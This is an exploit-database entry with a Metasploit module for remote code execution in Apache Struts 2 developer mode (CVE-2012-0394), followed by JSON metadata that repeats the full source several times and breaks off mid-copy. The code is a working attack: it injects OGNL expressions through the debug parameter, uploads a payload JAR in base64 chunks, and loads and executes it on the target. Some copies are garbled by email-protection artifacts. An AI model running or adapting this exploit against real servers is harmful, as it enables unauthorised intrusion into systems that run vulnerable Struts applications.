ID 1337DAY-ID-21855 Type zdt Reporter metasploit Modified 2014-02-04T00:00:00
Description
This Metasploit module exploits a remote command execution vulnerability in Apache Struts 2. The problem exists on applications running in developer mode, where the DebuggingInterceptor allows evaluation and execution of OGNL expressions, which allows remote attackers to execute arbitrary Java code. This Metasploit module has been tested successfully in Struts 2.3.16, Tomcat 7 and Ubuntu 10.04.
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts Developer Mode OGNL Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache
Struts 2. The problem exists on applications running in developer mode,
where the DebuggingInterceptor allows evaluation and execution of OGNL
expressions, which allows remote attackers to execute arbitrary Java
code. This module has been tested successfully in Struts 2.3.16, Tomcat
7 and Ubuntu 10.04.
},
'Author' =>
[
'Johannes Dahse', # Vulnerability discovery and PoC
'Andreas Nusser', # Vulnerability discovery and PoC
'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-0394'],
[ 'OSVDB', '78276'],
[ 'EDB', '18329'],
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],
[ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Struts 2', { } ]
],
'DisclosureDate' => 'Jan 06 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
], self.class)
end
def check
vprint_status("Testing to see if the target can evaluate our Java code...")
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
res = execute_command("new java.lang.Integer(#{addend_one}+#{addend_two})")
if res and res.code == 200 and res.body.to_i == sum
return Exploit::CheckCode::Vulnerable
end
if res and res.code == 200 and res.body.to_s =~ /#{sum}/
vprint_status("Code got evaluated. Target seems vulnerable, but the response contains something else:")
vprint_line(res.body.to_s)
return Exploit::CheckCode::Appears
end
return CheckCode::Safe
end
def exploit
@payload_jar = rand_text_alphanumeric(4+rand(4)) + ".jar"
upload_jar
execute_jar
end
def upload_jar
append = 'false'
jar = payload.encoded_jar.pack
chunk_length = 384 # 512 bytes when base64 encoded
while(jar.length > chunk_length)
java_upload_part(jar[0, chunk_length], @payload_jar, append)
jar = jar[chunk_length, jar.length - chunk_length]
append='true'
end
java_upload_part(jar, @payload_jar, append)
end
def java_upload_part(part, filename, append = 'false')
cmd = "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
cmd << "#f.close()"
execute_command(cmd)
end
def execute_jar
cmd = ""
# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
cmd << "#[email protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
cmd << "#q.setAccessible(true),#q.set(null,true),"
cmd << "#[email protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
cmd << "#q.setAccessible(true),#q.set(null,false),"
# create classloader
cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),"
# load class
cmd << "#c=#cl.loadClass('metasploit.Payload'),"
# invoke main method
cmd << "#c.getMethod('main',new java.lang.Class[]{@[email protected]('[Ljava.lang.String;')}).invoke("
cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
execute_command(cmd)
end
def execute_command(cmd)
injection = "#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD"
injection.gsub!(/CMD/, cmd)
vprint_status("Attempting to execute: #{cmd}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s),
'method' => 'GET',
'vars_get' =>
{
'debug' => 'command',
'expression' => injection
}
})
return res
end
end
# 0day.today [2018-01-09] #
{"hash": "7f51325dda93d2c60d83ca2141405cb6d467958f34a0aa45044b107511a4ebd3", "id": "1337DAY-ID-21855", "lastseen": "2018-01-09T13:22:52", "viewCount": 11, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "5e29cce08564c278e508408e2d03b895", "key": "cvelist"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "c97d9cbf5e5b6be7d04d5a4ea6630884", "key": "description"}, {"hash": "a8eb15bc47e0b8adcf1b0a3d5dd56376", "key": "href"}, {"hash": "8d2e0bb1b025f7f597465b56c586a7af", "key": "modified"}, {"hash": "8d2e0bb1b025f7f597465b56c586a7af", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "63192fee52055dd979e7c68148f3db0c", "key": "sourceData"}, {"hash": "74255ca6724c9333f457ecd312343cec", "key": "sourceHref"}, {"hash": "dd09ce170d24a6139931dce9d28039f1", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-0394"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125020"]}, {"type": "exploitdb", "idList": ["EDB-ID:31434", "EDB-ID:18329"]}, {"type": "dsquare", "idList": ["E-70", "E-342", "E-77"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS_DEV_MODE"]}, {"type": "canvas", "idList": ["STRUTSCODEINJECTION"]}], "modified": "2018-01-09T13:22:52"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/21855", "description": "This Metasploit module exploits a remote command execution vulnerability in Apache Struts 2. The problem exists on applications running in developer mode, where the DebuggingInterceptor allows evaluation and execution of OGNL expressions, which allows remote attackers to execute arbitrary Java code. This Metasploit module has been tested successfully in Struts 2.3.16, Tomcat 7 and Ubuntu 10.04.", "title": "Apache Struts Developer Mode OGNL Execution Exploit", "history": [{"bulletin": {"hash": "fd98363f84646d0d13fb832169c7652c94576327acbd6154a4fb58a05faf3f39", "id": "1337DAY-ID-21855", "lastseen": "2016-04-20T01:42:39", "enchantments": {"score": {"value": 6.0, "modified": "2016-04-20T01:42:39"}}, "hashmap": [{"hash": "dd09ce170d24a6139931dce9d28039f1", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c97d9cbf5e5b6be7d04d5a4ea6630884", "key": "description"}, {"hash": "86ff79ca8ef4b436d999400916d1e11f", "key": "sourceHref"}, {"hash": "8d2e0bb1b025f7f597465b56c586a7af", "key": "published"}, {"hash": "6784007488e0b3b7040babc4aba93a46", "key": "href"}, {"hash": "8d2e0bb1b025f7f597465b56c586a7af", "key": "modified"}, {"hash": "5e29cce08564c278e508408e2d03b895", "key": "cvelist"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "9f2e18eb469720da9760b79948796584", "key": "sourceData"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/21855", "description": "This Metasploit module exploits a remote command execution vulnerability in Apache Struts 2. The problem exists on applications running in developer mode, where the DebuggingInterceptor allows evaluation and execution of OGNL expressions, which allows remote attackers to execute arbitrary Java code. This Metasploit module has been tested successfully in Struts 2.3.16, Tomcat 7 and Ubuntu 10.04.", "viewCount": 1, "title": "Apache Struts Developer Mode OGNL Execution Exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "objectVersion": "1.0", "cvelist": ["CVE-2012-0394"], "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts Developer Mode OGNL Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache\r\n Struts 2. The problem exists on applications running in developer mode,\r\n where the DebuggingInterceptor allows evaluation and execution of OGNL\r\n expressions, which allows remote attackers to execute arbitrary Java\r\n code. This module has been tested successfully in Struts 2.3.16, Tomcat\r\n 7 and Ubuntu 10.04.\r\n },\r\n 'Author' =>\r\n [\r\n 'Johannes Dahse', # Vulnerability discovery and PoC\r\n 'Andreas Nusser', # Vulnerability discovery and PoC\r\n 'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\\\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-0394'],\r\n [ 'OSVDB', '78276'],\r\n [ 'EDB', '18329'],\r\n [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],\r\n [ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]\r\n ],\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'Struts 2', { } ]\r\n ],\r\n 'DisclosureDate' => 'Jan 06 2012',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', \"/struts2-blank/example/HelloWorld.action\"])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n vprint_status(\"Testing to see if the target can evaluate our Java code...\")\r\n addend_one = rand_text_numeric(rand(3) + 1).to_i\r\n addend_two = rand_text_numeric(rand(3) + 1).to_i\r\n sum = addend_one + addend_two\r\n\r\n res = execute_command(\"new java.lang.Integer(#{addend_one}+#{addend_two})\")\r\n\r\n if res and res.code == 200 and res.body.to_i == sum\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n if res and res.code == 200 and res.body.to_s =~ /#{sum}/\r\n vprint_status(\"Code got evaluated. Target seems vulnerable, but the response contains something else:\")\r\n vprint_line(res.body.to_s)\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n return CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n @payload_jar = rand_text_alphanumeric(4+rand(4)) + \".jar\"\r\n\r\n upload_jar\r\n execute_jar\r\n end\r\n\r\n def upload_jar\r\n append = 'false'\r\n jar = payload.encoded_jar.pack\r\n chunk_length = 384 # 512 bytes when base64 encoded\r\n\r\n while(jar.length > chunk_length)\r\n java_upload_part(jar[0, chunk_length], @payload_jar, append)\r\n jar = jar[chunk_length, jar.length - chunk_length]\r\n append='true'\r\n end\r\n java_upload_part(jar, @payload_jar, append)\r\n end\r\n\r\n def java_upload_part(part, filename, append = 'false')\r\n cmd = \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\"\r\n cmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\"\r\n cmd << \"#f.close()\"\r\n execute_command(cmd)\r\n end\r\n\r\n def execute_jar\r\n cmd = \"\"\r\n # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1\r\n cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n # create classloader\r\n cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),\"\r\n # load class\r\n cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n # invoke main method\r\n cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\"\r\n cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n execute_command(cmd)\r\n end\r\n\r\n def execute_command(cmd)\r\n injection = \"#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD\"\r\n injection.gsub!(/CMD/, cmd)\r\n\r\n vprint_status(\"Attempting to execute: #{cmd}\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path.to_s),\r\n 'method' => 'GET',\r\n 'vars_get' =>\r\n {\r\n 'debug' => 'command',\r\n 'expression' => injection\r\n }\r\n })\r\n\r\n return res\r\n end\r\n\r\n\r\nend\n\n# 0day.today [2016-04-20] #", "published": "2014-02-04T00:00:00", "references": [], "reporter": "metasploit", "modified": "2014-02-04T00:00:00", "href": "http://0day.today/exploit/description/21855"}, "lastseen": "2016-04-20T01:42:39", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": ["CVE-2012-0394"], "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts Developer Mode OGNL Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache\r\n Struts 2. The problem exists on applications running in developer mode,\r\n where the DebuggingInterceptor allows evaluation and execution of OGNL\r\n expressions, which allows remote attackers to execute arbitrary Java\r\n code. This module has been tested successfully in Struts 2.3.16, Tomcat\r\n 7 and Ubuntu 10.04.\r\n },\r\n 'Author' =>\r\n [\r\n 'Johannes Dahse', # Vulnerability discovery and PoC\r\n 'Andreas Nusser', # Vulnerability discovery and PoC\r\n 'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\\\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-0394'],\r\n [ 'OSVDB', '78276'],\r\n [ 'EDB', '18329'],\r\n [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],\r\n [ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]\r\n ],\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'Struts 2', { } ]\r\n ],\r\n 'DisclosureDate' => 'Jan 06 2012',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', \"/struts2-blank/example/HelloWorld.action\"])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n vprint_status(\"Testing to see if the target can evaluate our Java code...\")\r\n addend_one = rand_text_numeric(rand(3) + 1).to_i\r\n addend_two = rand_text_numeric(rand(3) + 1).to_i\r\n sum = addend_one + addend_two\r\n\r\n res = execute_command(\"new java.lang.Integer(#{addend_one}+#{addend_two})\")\r\n\r\n if res and res.code == 200 and res.body.to_i == sum\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n if res and res.code == 200 and res.body.to_s =~ /#{sum}/\r\n vprint_status(\"Code got evaluated. Target seems vulnerable, but the response contains something else:\")\r\n vprint_line(res.body.to_s)\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n return CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n @payload_jar = rand_text_alphanumeric(4+rand(4)) + \".jar\"\r\n\r\n upload_jar\r\n execute_jar\r\n end\r\n\r\n def upload_jar\r\n append = 'false'\r\n jar = payload.encoded_jar.pack\r\n chunk_length = 384 # 512 bytes when base64 encoded\r\n\r\n while(jar.length > chunk_length)\r\n java_upload_part(jar[0, chunk_length], @payload_jar, append)\r\n jar = jar[chunk_length, jar.length - chunk_length]\r\n append='true'\r\n end\r\n java_upload_part(jar, @payload_jar, append)\r\n end\r\n\r\n def java_upload_part(part, filename, append = 'false')\r\n cmd = \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\"\r\n cmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\"\r\n cmd << \"#f.close()\"\r\n execute_command(cmd)\r\n end\r\n\r\n def execute_jar\r\n cmd = \"\"\r\n # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1\r\n cmd << \"#[email\u00a0protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n cmd << \"#[email\u00a0protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n # create classloader\r\n cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),\"\r\n # load class\r\n cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n # invoke main method\r\n cmd << \"#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')}).invoke(\"\r\n cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n execute_command(cmd)\r\n end\r\n\r\n def execute_command(cmd)\r\n injection = \"#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD\"\r\n injection.gsub!(/CMD/, cmd)\r\n\r\n vprint_status(\"Attempting to execute: #{cmd}\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path.to_s),\r\n 'method' => 'GET',\r\n 'vars_get' =>\r\n {\r\n 'debug' => 'command',\r\n 'expression' => injection\r\n }\r\n })\r\n\r\n return res\r\n end\r\n\r\n\r\nend\n\n# 0day.today [2018-01-09] #", "published": "2014-02-04T00:00:00", "references": [], "reporter": "metasploit", "modified": "2014-02-04T00:00:00", "href": "https://0day.today/exploit/description/21855"}
{"cve": [{"lastseen": "2016-09-03T16:10:11", "bulletinFamily": "NVD", "description": "** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not \"a security vulnerability itself.\"", "modified": "2014-02-20T23:48:08", "published": "2012-01-08T10:55:01", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0394", "id": "CVE-2012-0394", "title": "CVE-2012-0394", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "dsquare": [{"lastseen": "2017-09-26T15:33:26", "bulletinFamily": "exploit", "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "modified": "2013-04-02T00:00:00", "published": "2012-03-24T00:00:00", "id": "E-70", "href": "", "type": "dsquare", "title": "Apache-Struts DebuggingInterceptor < 2.3.1.1 RCE Windows", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-26T15:33:26", "bulletinFamily": "exploit", "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "modified": "2013-04-02T00:00:00", "published": "2012-03-24T00:00:00", "id": "E-77", "href": "", "type": "dsquare", "title": "Apache-Struts DebuggingInterceptor < 2.3.1.1 RCE Linux", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-26T15:33:26", "bulletinFamily": "exploit", "description": "Apache-Struts2 RCE\n\nVulnerability Type: Remote Command Execution", "modified": "2013-04-02T00:00:00", "published": "2012-03-24T00:00:00", "id": "E-342", "href": "", "type": "dsquare", "title": "Apache-Struts ExceptionDelegator < 2.3.1.1 RCE Linux", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:36", "bulletinFamily": "exploit", "description": "", "modified": "2014-02-01T00:00:00", "published": "2014-02-01T00:00:00", "href": "https://packetstormsecurity.com/files/125020/Apache-Struts-Developer-Mode-OGNL-Execution.html", "id": "PACKETSTORM:125020", "type": "packetstorm", "title": "Apache Struts Developer Mode OGNL Execution", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts Developer Mode OGNL Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in Apache \nStruts 2. The problem exists on applications running in developer mode, \nwhere the DebuggingInterceptor allows evaluation and execution of OGNL \nexpressions, which allows remote attackers to execute arbitrary Java \ncode. This module has been tested successfully in Struts 2.3.16, Tomcat \n7 and Ubuntu 10.04. \n}, \n'Author' => \n[ \n'Johannes Dahse', # Vulnerability discovery and PoC \n'Andreas Nusser', # Vulnerability discovery and PoC \n'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\\ \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2012-0394'], \n[ 'OSVDB', '78276'], \n[ 'EDB', '18329'], \n[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ], \n[ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ] \n], \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'Struts 2', { } ] \n], \n'DisclosureDate' => 'Jan 06 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action', \"/struts2-blank/example/HelloWorld.action\"]) \n], self.class) \nend \n \ndef check \nvprint_status(\"Testing to see if the target can evaluate our Java code...\") \naddend_one = rand_text_numeric(rand(3) + 1).to_i \naddend_two = rand_text_numeric(rand(3) + 1).to_i \nsum = addend_one + addend_two \n \nres = execute_command(\"new java.lang.Integer(#{addend_one}+#{addend_two})\") \n \nif res and res.code == 200 and res.body.to_i == sum \nreturn Exploit::CheckCode::Vulnerable \nend \n \nif res and res.code == 200 and res.body.to_s =~ /#{sum}/ \nvprint_status(\"Code got evaluated. Target seems vulnerable, but the response contains something else:\") \nvprint_line(res.body.to_s) \nreturn Exploit::CheckCode::Appears \nend \n \nreturn CheckCode::Safe \nend \n \ndef exploit \n@payload_jar = rand_text_alphanumeric(4+rand(4)) + \".jar\" \n \nupload_jar \nexecute_jar \nend \n \ndef upload_jar \nappend = 'false' \njar = payload.encoded_jar.pack \nchunk_length = 384 # 512 bytes when base64 encoded \n \nwhile(jar.length > chunk_length) \njava_upload_part(jar[0, chunk_length], @payload_jar, append) \njar = jar[chunk_length, jar.length - chunk_length] \nappend='true' \nend \njava_upload_part(jar, @payload_jar, append) \nend \n \ndef java_upload_part(part, filename, append = 'false') \ncmd = \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\" \ncmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\" \ncmd << \"#f.close()\" \nexecute_command(cmd) \nend \n \ndef execute_jar \ncmd = \"\" \n# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1 \ncmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\" \ncmd << \"#q.setAccessible(true),#q.set(null,true),\" \ncmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\" \ncmd << \"#q.setAccessible(true),#q.set(null,false),\" \n# create classloader \ncmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),\" \n# load class \ncmd << \"#c=#cl.loadClass('metasploit.Payload'),\" \n# invoke main method \ncmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\" \ncmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\" \nexecute_command(cmd) \nend \n \ndef execute_command(cmd) \ninjection = \"#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD\" \ninjection.gsub!(/CMD/, cmd) \n \nvprint_status(\"Attempting to execute: #{cmd}\") \n \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s), \n'method' => 'GET', \n'vars_get' => \n{ \n'debug' => 'command', \n'expression' => injection \n} \n}) \n \nreturn res \nend \n \n \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125020/struts_dev_mode.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-03T14:38:10", "bulletinFamily": "exploit", "description": "Apache Struts Developer Mode OGNL Execution. CVE-2012-0394. Remote exploit for java platform", "modified": "2014-02-05T00:00:00", "published": "2014-02-05T00:00:00", "id": "EDB-ID:31434", "href": "https://www.exploit-db.com/exploits/31434/", "type": "exploitdb", "title": "Apache Struts Developer Mode OGNL Execution", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts Developer Mode OGNL Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache\r\n Struts 2. The problem exists on applications running in developer mode,\r\n where the DebuggingInterceptor allows evaluation and execution of OGNL\r\n expressions, which allows remote attackers to execute arbitrary Java\r\n code. This module has been tested successfully in Struts 2.3.16, Tomcat\r\n 7 and Ubuntu 10.04.\r\n },\r\n 'Author' =>\r\n [\r\n 'Johannes Dahse', # Vulnerability discovery and PoC\r\n 'Andreas Nusser', # Vulnerability discovery and PoC\r\n 'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\\\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-0394'],\r\n [ 'OSVDB', '78276'],\r\n [ 'EDB', '18329'],\r\n [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],\r\n [ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]\r\n ],\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'Struts 2', { } ]\r\n ],\r\n 'DisclosureDate' => 'Jan 06 2012',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', \"/struts2-blank/example/HelloWorld.action\"])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n vprint_status(\"Testing to see if the target can evaluate our Java code...\")\r\n addend_one = rand_text_numeric(rand(3) + 1).to_i\r\n addend_two = rand_text_numeric(rand(3) + 1).to_i\r\n sum = addend_one + addend_two\r\n\r\n res = execute_command(\"new java.lang.Integer(#{addend_one}+#{addend_two})\")\r\n\r\n if res and res.code == 200 and res.body.to_i == sum\r\n return 